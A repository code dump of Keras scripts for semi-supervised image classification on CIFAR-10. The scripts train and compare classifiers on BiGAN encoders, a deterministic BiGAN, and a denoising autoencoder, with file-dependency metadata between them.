for i, layer in enumerate(pretrained_e_one_layer_trainable.layers):
if i != 17:
if i != 19:
layer.trainable = False
# Classifier with randomly initialized encoder
random_e = deterministic_encoder_model()
classifier_random = classifier_e_trainable_model(random_e)
classifier_random_aug = classifier_e_trainable_model(random_e)
# Classifier with trainable pre-trained encoder
pretrained_e_trainable.load_weights(pretrained_encoder_path)
classifier_pretrained_trainable = classifier_e_trainable_model(pretrained_e_trainable)
classifier_pretrained_trainable_aug = classifier_e_trainable_model(pretrained_e_trainable)
# ----------------------------
# Inspect trainable weights
# ----------------------------
# Print details of trainable and non-trainable weights of models
if index == 0 and iteration == 0:
# Print number of trainable and non-trainable parameters for each classifier
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained.non_trainable_weights)]))
print('\nClassifier w/ Frozen Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_aug.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_aug.non_trainable_weights)]))
print('\nClassifier w/ Frozen Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_lastconv.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_lastconv.non_trainable_weights)]))
print('\nClassifier w/ Trainable Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_lastconv_aug.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_lastconv_aug.non_trainable_weights)]))
print('\nClassifier w/ Trainable Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_random.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_random.non_trainable_weights)]))
print('\nClassifier w/ Random Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_random_aug.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_random_aug.non_trainable_weights)]))
print('\nClassifier w/ Random Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_trainable.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_trainable.non_trainable_weights)]))
print('\nClassifier w/ Fully Trainable Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_trainable_aug.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_trainable_aug.non_trainable_weights)]))
print('\nClassifier w/ Fully Trainable Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
# ----------------------------
# Compile models
# ----------------------------
classifier_pretrained.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_aug.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_lastconv.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_lastconv_aug.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_random.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_random_aug.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_trainable.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_trainable_aug.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
# ----------------------------
# Train classifiers
# ----------------------------
# Train classifier with frozen pretrained encoder
model_checkpoint = ModelCheckpoint('classifier_1.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier_pretrained.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier_pretrained.load_weights('classifier_1.h5')
score = classifier_pretrained.evaluate(X_test, y_test_one_hot, verbose=0)
pretrained_score += score[1]
# Train previous classifier with augmentation
classifier_pretrained_aug.load_weights('classifier_1.h5')
train_batches = datagen.flow(reduced_x_train, reduced_y_train, batch_size=batch_size)
classifier_pretrained_aug.fit_generator(train_batches,
epochs=aug_epochs,
steps_per_epoch=reduced_x_train.shape[0]//batch_size)
classifier_pretrained_aug.save_weights('classifier_2.h5')
score = classifier_pretrained_aug.evaluate(X_test, y_test_one_hot, batch_size=batch_size, verbose=1)
pretrained_aug_score += score[1]
# Train classifier with frozen pretrained encoder (last conv layer trainable)
model_checkpoint = ModelCheckpoint('classifier_3.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier_pretrained_lastconv.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier_pretrained_lastconv.load_weights('classifier_3.h5')
score = classifier_pretrained_lastconv.evaluate(X_test, y_test_one_hot, verbose=0)
pretrained_lastconv_score += score[1]
# Train previous classifier with augmentation
classifier_pretrained_lastconv_aug.load_weights('classifier_3.h5')
train_batches = datagen.flow(reduced_x_train, reduced_y_train, batch_size=batch_size)
classifier_pretrained_lastconv_aug.fit_generator(train_batches,
epochs=aug_epochs,
steps_per_epoch=reduced_x_train.shape[0] // batch_size)
classifier_pretrained_lastconv_aug.save_weights('classifier_4.h5')
score = classifier_pretrained_lastconv_aug.evaluate(X_test, y_test_one_hot, batch_size=batch_size, verbose=1)
pretrained_lastconv_aug_score += score[1]
# Train classifier with randomly initialized encoder
model_checkpoint = ModelCheckpoint('classifier_5.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier_random.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
shuffle=True,
validation_split=val_split)
classifier_random.load_weights('classifier_5.h5')
score = classifier_random.evaluate(X_test, y_test_one_hot, verbose=0)
random_score += score[1]
# Train previous classifier with augmentation
classifier_random_aug.load_weights('classifier_5.h5')
train_batches = datagen.flow(reduced_x_train, reduced_y_train, batch_size=batch_size)
classifier_random_aug.fit_generator(train_batches,
epochs=aug_epochs,
steps_per_epoch=reduced_x_train.shape[0]//batch_size)
classifier_random_aug.save_weights('classifier_6.h5')
score = classifier_random_aug.evaluate(X_test, y_test_one_hot, batch_size=batch_size, verbose=1)
random_aug_score += score[1]
# Train classifier with frozen pretrained encoder (last conv layer trainable)
model_checkpoint = ModelCheckpoint('classifier_7.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier_pretrained_trainable.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier_pretrained_trainable.load_weights('classifier_7.h5')
score = classifier_pretrained_trainable.evaluate(X_test, y_test_one_hot, verbose=0)
pretrained_trainable_score += score[1]
# Train previous classifier with augmentation
classifier_pretrained_trainable_aug.load_weights('classifier_7.h5')
train_batches = datagen.flow(reduced_x_train, reduced_y_train, batch_size=batch_size)
classifier_pretrained_trainable_aug.fit_generator(train_batches,
epochs=aug_epochs,
steps_per_epoch=reduced_x_train.shape[0] // batch_size)
classifier_pretrained_trainable_aug.save_weights('classifier_8.h5')
score = classifier_pretrained_trainable_aug.evaluate(X_test, y_test_one_hot, batch_size=batch_size, verbose=1)
pretrained_trainable_aug_score += score[1]
# Record average classification accuracy for each no. of labelled examples
classifier_pretrained_acc[index] = 100 * pretrained_score / num_iterations
classifier_pretrained_aug_acc[index] = 100 * pretrained_aug_score / num_iterations
classifier_pretrained_lastconv_acc[index] = 100 * pretrained_lastconv_score / num_iterations
classifier_pretrained_lastconv_aug_acc[index] = 100 * pretrained_lastconv_aug_score / num_iterations
classifier_random_acc[index] = 100 * random_score / num_iterations
classifier_random_aug_acc[index] = 100 * random_aug_score / num_iterations
classifier_pretrained_trainable_acc[index] = 100 * pretrained_trainable_score / num_iterations
classifier_pretrained_trainable_aug_acc[index] = 100 * pretrained_trainable_aug_score / num_iterations
# Save results to file
np.savetxt('Results/classifier1.txt', classifier_pretrained_acc, fmt='%f')
np.savetxt('Results/classifier2.txt', classifier_pretrained_aug_acc, fmt='%f')
np.savetxt('Results/classifier3.txt', classifier_pretrained_lastconv_acc, fmt='%f')
np.savetxt('Results/classifier4.txt', classifier_pretrained_lastconv_aug_acc, fmt='%f')
np.savetxt('Results/classifier5.txt', classifier_random_acc, fmt='%f')
np.savetxt('Results/classifier6.txt', classifier_random_aug_acc, fmt='%f')
np.savetxt('Results/classifier7.txt', classifier_pretrained_trainable_acc, fmt='%f')
np.savetxt('Results/classifier8.txt', classifier_pretrained_trainable_aug_acc, fmt='%f')
# =====================================
# Visualize results
# =====================================
# Plot comparison graph
plt.figure()
plt.plot(num_unlabelled, classifier_pretrained_acc, '-o', num_unlabelled, classifier_pretrained_aug_acc,
'-o', num_unlabelled, classifier_random_aug_acc, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['BiGAN Encoder + No Augmentation', 'BiGAN Encoder + Augmentation',
'Randomly Initialized Encoder + Augmentation'], loc='lower right')
plt.grid()
plt.savefig('cifar10_bigan_aug_compar.png')
# Plot comparison graph
plt.figure()
plt.plot(num_unlabelled, classifier_pretrained_acc, '-o', num_unlabelled, classifier_pretrained_aug_acc,
'-o', num_unlabelled, classifier_pretrained_lastconv_acc, '-o', num_unlabelled, classifier_pretrained_lastconv_aug_acc, '-o',
num_unlabelled, classifier_pretrained_trainable_acc, '-o', num_unlabelled, classifier_pretrained_trainable_aug_acc, '-o',
num_unlabelled, classifier_random_aug_acc, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Frozen + No Augmentation', 'Frozen + Augmentation', 'Last Conv Trainable + No Augmentation',
'Last Conv Trainable + Augmentation', 'Fully Trainable + No Augmentation', 'Fully Trainable + Augmentation',
'Randomly Initialized Encoder + Augmentation'], loc='lower right')
plt.grid()
plt.savefig('cifar10_bigan_aug_trainable_compar.png')
# Plot comparison graph
plt.figure()
plt.plot(num_unlabelled, classifier_pretrained_acc, '-o', num_unlabelled, classifier_random_acc, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['BiGAN Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.savefig('cifar10_pretrained_fully_sup_compar.png') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,492 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py | from keras.optimizers import Adam
import numpy as np
from cifar10_models import deterministic_encoder_model, generator_model, bigan_discriminator_model
from common_models.common_models import bigan_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import save_imgs, plot_gan_batch_loss, plot_gan_epoch_loss, plot_discriminator_acc, save_reconstructions
from functions.data_funcs import get_cifar10
# Trains a deterministic BiGAN on CIFAR-10: a generator (z -> img), an
# encoder (img -> z) and a joint discriminator over (z, img) pairs, trained
# adversarially; model weights and diagnostic plots are written to disk.
# Set random seed
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
image_path = 'Images/cifar10_bigan_determ'
model_path = 'Models/cifar10_bigan_determ'
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()
# =====================================
# Instantiate models
# =====================================
# Instantiate models
generator = generator_model()
encoder = deterministic_encoder_model()
discriminator = bigan_discriminator_model()
# Specify optimizer
lr = 1e-4
beta_1 = 0.5
beta_2 = 0.999
opt_d = Adam(lr=lr, beta_1=beta_1, beta_2=beta_2)
opt_g = Adam(lr=lr, beta_1=beta_1, beta_2=beta_2)
# Two views of the same underlying networks: one with only the discriminator
# trainable, one with only the generator+encoder trainable. The trainable
# flags are captured at compile time.
# Freeze generator and encoder while discriminator is changed
generator.trainable = False
encoder.trainable = False
bigan_discriminator = bigan_model(generator, encoder, discriminator, latent_dim, img_shape)
# NOTE(review): compiled without metrics=['accuracy'], yet d_loss[1] below is
# printed as accuracy. For a multi-output model, train_on_batch returns
# per-output losses after the total, so d_loss[1] is likely the first
# output's loss, not an accuracy — confirm against bigan_model's outputs.
bigan_discriminator.compile(optimizer=opt_d, loss='binary_crossentropy')
# Freeze discriminator while generator and encoder are trained
generator.trainable = True
encoder.trainable = True
discriminator.trainable = False
bigan_generator = bigan_model(generator, encoder, discriminator, latent_dim, img_shape)
bigan_generator.compile(optimizer=opt_g, loss='binary_crossentropy')
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 1000
batch_size = 100
# Training settings
num_batches = int(X_train.shape[0] / batch_size)
epoch_save_interval = 10
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
    # Print current epoch number
    print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
    # Set epoch losses to zero
    d_epoch_loss_sum = 0
    g_epoch_loss_sum = 0
    d_acc = 0
    # Shuffle training set
    # NOTE(review): randint samples indices WITH replacement, so each epoch is
    # a bootstrap resample (some images duplicated, some dropped), not a true
    # shuffle; np.random.permutation(X_train.shape[0]) would give a permutation.
    new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
    X_train = X_train[new_permutation]
    # Train on all batches
    for batch in range(num_batches):
        # Select next batch of images from training set
        imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
        # Generator normal distributed latent vector
        z = np.random.normal(size=(batch_size, latent_dim))
        # Create labels for discriminator inputs
        valid = np.ones((batch_size, 1))
        fake = np.zeros((batch_size, 1))
        # ---------------------
        # Train Discriminator
        # ---------------------
        # Train the discriminator (img -> z is valid, z -> img is fake)
        d_loss = bigan_discriminator.train_on_batch([z, imgs], [fake, valid])
        # Record discriminator batch loss details
        d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
        d_epoch_loss_sum += d_loss[0]
        d_acc += d_loss[1]
        # ----------------------------
        # Train Generator and Encoder
        # ----------------------------
        # Train the generator (z -> img_ is valid and img -> z_ is is invalid)
        ge_loss = bigan_generator.train_on_batch([z, imgs], [valid, fake])
        g_batch_loss_trajectory[epoch * num_batches + batch] = ge_loss[0]
        g_epoch_loss_sum += ge_loss[0]
        # Print progress
        print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
                                                                                      d_loss[0], 100 * d_loss[1],
                                                                                      ge_loss[0]))
    # Get epoch loss data
    d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
    g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
    d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
    # If at save interval, save generated image samples
    if epoch % epoch_save_interval == 0:
        z = np.random.normal(size=(25, latent_dim))
        gen_imgs = generator.predict(z)
        save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=True)
    # Save models to file
    # (runs every epoch, so the weights on disk always track the latest epoch)
    save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualize results
# =====================================
# Save reconstructions
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Plot loss curves
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
plot_discriminator_acc(image_path, epochs, d_acc_trajectory)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,493 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_dae_train.py | import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from functions.auxiliary_funcs import save_models
from functions.data_funcs import get_cifar10
from functions.visualization_funcs import save_reconstructions, plot_train_accuracy, plot_train_loss
from cifar10_models import deterministic_encoder_model, generator_model, autoencoder_model
# Trains a denoising autoencoder (DAE) on CIFAR-10: noisy inputs, clean
# targets. The best checkpoint (lowest val_loss) is reloaded at the end and
# its encoder/decoder are saved and visualized.
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
image_path = 'Images/cifar10_dae'
model_path = 'Models/cifar10_dae'
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()
# Corrupt data with additive Gaussian noise, clipped back into [0, 1]
noise_factor = 0.5
X_train_noisy = X_train + noise_factor * np.random.normal(0., 1, size=X_train.shape)
X_test_noisy = X_test + noise_factor * np.random.normal(0., 1, size=X_test.shape)
X_train_noisy = np.clip(X_train_noisy, 0., 1.)
X_test_noisy = np.clip(X_test_noisy, 0., 1.)
# =====================================
# Instantiate and compile models
# =====================================
encoder = deterministic_encoder_model()
generator = generator_model()
# Warm-start the decoder from pre-trained GAN generator weights.
# NOTE(review): assumes 'cifar10_gan_generator' exists in the working
# directory — confirm the path and that this warm start is intended.
generator.load_weights('cifar10_gan_generator')
autoencoder = autoencoder_model(encoder, generator)
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])
# =====================================
# Train models
# =====================================
# Specify hyper-parameters for training
epochs = 100
batch_size = 128
patience = 5
# Stop on val_loss plateau; checkpoint keeps only the best weights on disk.
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='min')
callbacks = [early_stopping, model_checkpoint]
# Denoising objective: reconstruct the clean image from its noisy version.
history = autoencoder.fit(X_train_noisy, X_train,
                          epochs=epochs,
                          batch_size=batch_size,
                          shuffle=True,
                          validation_split=0.1,
                          callbacks=callbacks,
                          verbose=1)
# Rebuild fresh encoder/decoder and load the best checkpointed weights into them
encoder = deterministic_encoder_model()
decoder = generator_model()
autoencoder = autoencoder_model(encoder, decoder)
autoencoder.load_weights(model_path + '.h5')
# Save the best-checkpoint encoder and decoder.
# BUG FIX: the original passed the stale last-epoch `generator` here (and to
# save_reconstructions below) instead of the reloaded `decoder`.
save_models(path=model_path, encoder=encoder, generator=decoder)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images using the best-checkpoint models
save_reconstructions(image_path, num_classes, X_test, y_test, decoder, encoder, img_rows, img_cols, channels, color=True)
# Plot loss curves
plot_train_loss(image_path, history)
plot_train_accuracy(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
